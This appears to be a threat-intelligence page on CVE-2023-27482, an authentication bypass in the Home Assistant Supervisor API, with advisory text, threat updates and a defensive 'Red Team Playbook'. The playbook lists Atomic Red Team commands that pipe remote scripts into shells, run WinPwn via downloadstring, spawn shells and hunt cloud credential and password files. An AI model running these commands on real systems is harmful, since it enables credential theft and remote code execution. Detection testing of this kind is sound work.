CVE-2023-27482
Overview
This vulnerability is an authentication bypass affecting the Supervisor API component of Home Assistant installations using Supervisor versions 2023.01.1 or older. The root cause lies in improper access controls that allow unauthenticated remote users to interact with the Supervisor API, circumventing intended authentication mechanisms. The flaw specifically impacts the Supervisor feature within Home Assistant, enabling unauthorized API access without valid credentials.
Vulnerability Description
homeassistant is an open source home automation tool. A remotely exploitable vulnerability bypassing authentication for accessing the Supervisor API through Home Assistant has been discovered. This impacts all Home Assistant installation types that use the Supervisor 2023.01.1 or older. Installation types, like Home Assistant Container (for example Docker), or Home Assistant Core manually in a Python environment, are not affected. The issue has been mitigated and closed in Supervisor version 2023.03.1, which has been rolled out to all affected installations via the auto-update feature of the Supervisor. This rollout has been completed at the time of publication of this advisory. Home Assistant Core 2023.3.0 included mitigation for this vulnerability. Upgrading to at least that version is thus advised. In case one is not able to upgrade the Home Assistant Supervisor or the Home Assistant Core application at this time, it is advised to not expose your Home Assistant instance to the internet.
Impact
An attacker can remotely access and control the Supervisor API without authentication, enabling full compromise of the Home Assistant Supervisor management functions. No user interaction or authentication is required, and the vulnerability is exploitable over the network. This can lead to unauthorized administrative control, data exposure, and potential disruption of home automation services. The CVSS vector indicates high impact with no privileges or user interaction needed (AV:N/AC:L/PR:N/UI:N).
Solution
To remediate this vulnerability, upgrade the Home Assistant Supervisor to version 2023.03.1 or later, which includes the authentication bypass fix. Additionally, update Home Assistant Core to version 2023.3.0 or newer to apply mitigation. The Supervisor auto-update feature has rolled out the patch to affected installations. If immediate upgrade is not possible, it is recommended to restrict internet exposure of the Home Assistant instance. Detailed patch and update instructions are available in the official Home Assistant security advisory at https://github.com/home-assistant/core/security/advisories/GHSA-2j8f-h4mr-qr25.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Home Assistant Supervisor API represents a significant security flaw that allows unauthorized access to sensitive functionalities within the home automation platform. Specifically, this issue arises from a failure in the authentication mechanisms, enabling attackers to bypass security controls and interact with the Supervisor API without proper credentials. This flaw affects all installations utilizing Supervisor version 2023.01.1 or older, which includes a wide range of deployment scenarios for Home Assistant. However, installations that utilize Home Assistant Container or Home Assistant Core in a Python environment remain unaffected, indicating a specific weakness in the Supervisor's implementation.
Exploitation of this vulnerability can occur remotely, making it particularly dangerous for users who expose their Home Assistant instances to the internet. Attackers could leverage this flaw to gain control over the Supervisor API, potentially allowing them to manipulate settings, access sensitive data, or even control connected devices within the home automation ecosystem. Scenarios could include unauthorized changes to automation rules, disabling security features, or accessing personal information stored within the system. The implications of such actions could lead to privacy breaches, unauthorized surveillance, or even physical security risks, depending on the nature of the connected devices.
The real-world impact of this vulnerability is substantial, especially considering the growing reliance on home automation systems for convenience and security. For businesses that integrate Home Assistant into their operations, the risks escalate significantly. A successful attack could not only compromise individual user privacy but also damage the reputation of the business, lead to financial losses, and potentially expose the organization to legal liabilities. The high CVSS score of 10.0 underscores the critical nature of this vulnerability, indicating that it poses an extreme risk to users and organizations alike.
To detect and mitigate this vulnerability, users are strongly advised to upgrade their installations to the latest versions of both the Supervisor and Home Assistant Core, as the developers have implemented necessary patches in versions 2023.03.1 and 2023.3.0, respectively. For those unable to perform immediate upgrades, it is crucial to avoid exposing the Home Assistant instance to the internet, thereby reducing the attack surface. Network segmentation and the use of Virtual Private Networks (VPNs) can also enhance security by limiting external access to the system. Additionally, monitoring logs for unusual access patterns can help in identifying potential exploitation attempts.
In conclusion, the vulnerability within the Home Assistant Supervisor API highlights the critical importance of maintaining up-to-date software and implementing robust security practices in home automation systems. As these technologies become increasingly integrated into daily life, the potential consequences of such vulnerabilities underscore the need for vigilance and proactive measures to safeguard user privacy and security. The swift response from the developers in rolling out patches demonstrates a commitment to user safety, but it ultimately falls upon users to ensure their systems are adequately protected against emerging threats.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2023-27482, indicating a modest resurgence in attempts to exploit the Home Assistant Supervisor API authentication bypass vulnerability. Although the EPSS score shows a minor decline, the uptick in telemetry suggests adversaries remain interested in leveraging this critical flaw despite patches being available. This subtle rise in exploitation attempts underscores the persistent risk posed by unpatched or improperly configured Home Assistant environments. Defenders should recognize that while the overall exploit momentum is not accelerating rapidly, the consistent presence of exploitation signals a sustained threat that could lead to unauthorized access and control over affected home automation systems. Consequently, the threat level remains elevated, warranting continued vigilance in monitoring and response efforts.
Update 2 — June 07, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting the CVE-2023-27482 vulnerability, reflected by a significant uptick in telemetry signals. This increase, while not indicative of a rapid acceleration, signals a persistent and growing interest among threat actors in leveraging this critical authentication bypass flaw. The elevated EPSS score corroborates this trend, suggesting a higher likelihood of exploitation in the near term. For defenders, this development underscores the ongoing risk posed by environments that remain unpatched or improperly configured, as adversaries continue to probe for opportunities to gain unauthorized access to Home Assistant Supervisor APIs. The sustained exploitation activity elevates the threat level, reinforcing the necessity for continuous monitoring and proactive threat detection to mitigate potential impacts on home automation infrastructures.
Update 3 — July 05, 2026
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-27482 exploitation attempts. While the overall trend remains stable, this subtle uptick indicates persistent adversary interest in targeting unpatched Home Assistant Supervisor instances. The elevated EPSS score continues to reflect a high probability of exploitation, underscoring that threat actors remain actively probing for vulnerable deployments. Although no new exploit variants or proof-of-concept code have surfaced, the incremental rise in detection signals ongoing reconnaissance and potential preparatory actions by attackers. This development reinforces the criticality of maintaining up-to-date Supervisor versions, as environments lagging in patching remain attractive targets. Consequently, the threat level should be considered sustained at a high posture, with defenders advised to maintain vigilance given the steady exploitation pressure observed through our telemetry.
Update 4 — July 14, 2026
CSURFACE threat intelligence has identified a slight increase in reconnaissance activity targeting the CVE-2023-27482 vulnerability, reflected by a modest uptick in related detection signals. While no new exploit variants or proof-of-concept codes have been observed, this subtle rise suggests adversaries are intensifying their efforts to identify unpatched Home Assistant Supervisor deployments. The persistence of these probing attempts underscores the continued attractiveness of this vulnerability for remote unauthorized access, particularly in environments that have not yet applied the critical patch. Given the vulnerability’s high severity and the stable EPSS score near the 99th percentile, this development sustains the threat level at a high posture. Defenders should interpret this as an indication that threat actors remain actively engaged in preparatory reconnaissance, maintaining pressure on potentially vulnerable targets despite the absence of new exploit techniques.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Home-Assistant | Home-Assistant | All |
cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:*
|
|
|
Home-Assistant | Supervisor | All |
cpe:2.3:a:home-assistant:supervisor:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
26 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-27482 |
| github.com |
GitHub CVE
|
https://github.com/home-assistant/core/security/advisories/GHSA-2j8f-h4mr-qr25 |
| home-assistant.io |
GitHub CVE
|
https://www.home-assistant.io/blog/2023/03/08/supervisor-security-disclosure/ |
| github.com |
GitHub CVE
|
https://github.com/elttam/publications/blob/master/writeups/home-assistant/supervisor-authentication-bypass-advisory.md |
| elttam.com |
GitHub CVE
|
https://www.elttam.com/blog/pwnassistant/ |